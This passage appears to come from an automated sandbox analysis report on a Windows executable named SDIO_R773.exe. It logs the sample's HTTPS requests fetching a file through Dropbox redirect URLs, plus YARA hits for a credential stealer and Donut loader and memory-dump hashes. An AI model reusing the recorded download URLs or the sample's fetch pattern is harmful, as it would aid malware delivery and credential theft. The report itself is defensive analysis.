                                                                                                                                                                                                                                            Host: www.dropbox.com
2025-01-11 10:56:36 UTC | 4261 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                            Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED]
                                                                                                                                                                                                                                            Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' 'nonce-Or+ZDAYwRQ2id8utyu+MWkyzUbI='
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Location: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1#
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                            Set-Cookie: gvc=MjgyNDkyNDI3NDAxODcyODUyNDEwMTcxNTA4NTMxMzI0NDUyOTM5; Path=/; Expires=Thu, 10 Jan 2030 10:56:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: t=CJ8LyDGQCmNILsPH3L1AS_WA; Path=/; Domain=dropbox.com; Expires=Sun, 11 Jan 2026 10:56:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: __Host-js_csrf=CJ8LyDGQCmNILsPH3L1AS_WA; Path=/; Expires=Sun, 11 Jan 2026 10:56:35 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: __Host-ss=tD-wJ70rT0; Path=/; Expires=Sun, 11 Jan 2026 10:56:35 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                            Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Thu, 10 Jan 2030 10:56:35 GMT
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:35 GMT
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                            Server: envoy
                                                                                                                                                                                                                                            Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                            X-Dropbox-Request-Id: 79515ab1b4684a798833d4306d5120c7
                                                                                                                                                                                                                                            Connection: close
2025-01-11 10:56:36 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
Data Ascii: <!--status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49749 | 162.125.66.15 | 443 | 7528 | C:\Users\user\Desktop\SDIO_R773.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 10:56:36 UTC | 401 | OUT | GET /cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1# HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
2025-01-11 10:56:37 UTC | 203 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                            Content-Length: 1005
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            X-Dropbox-Response-Origin: local
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:36 GMT
                                                                                                                                                                                                                                            Server: envoy
                                                                                                                                                                                                                                            Connection: close
2025-01-11 10:56:37 UTC | 1005 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 400</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:05:55:57
                                                                                                                                                                                                                                            Start date:11/01/2025
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SDIO_R773.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:5'304'144 bytes
                                                                                                                                                                                                                                            MD5 hash:C45A36EC4B4F8D8412C60DB459C2B9D2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: HoW+
                                                                                                                                                                                                                                              • API String ID: 0-1697190144
                                                                                                                                                                                                                                              • Opcode ID: 13994b12b4fc34cb012bc3bd243ab28f79f5bcfa59e5594994d2b880dd266e5d
                                                                                                                                                                                                                                              • Instruction ID: 8f857be9b54b2b2a6a24ae896bd5a94ca14680f0c32d58a2d17755d7cd140d56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13994b12b4fc34cb012bc3bd243ab28f79f5bcfa59e5594994d2b880dd266e5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF61FC31009AD19BC717DF38CAA5A96BFAABF0331071E4AC9D8C14E363C3656601C767
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1e8121e5cbfaa198bff0f2e31f5adb49ceb4744afcd63d24e6bcc92b1e3b2c83
                                                                                                                                                                                                                                              • Instruction ID: 7bd526c6cee56b6d5d26e722299fd1d58f2fc104ac2bfcb0912ee034779f8eaa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e8121e5cbfaa198bff0f2e31f5adb49ceb4744afcd63d24e6bcc92b1e3b2c83
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C58140310096D18BC7179F38CEA5696BFA5BF03324B1E4AC9D8C18E7A3C3256544C7AB
Memory Dump Source
• Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd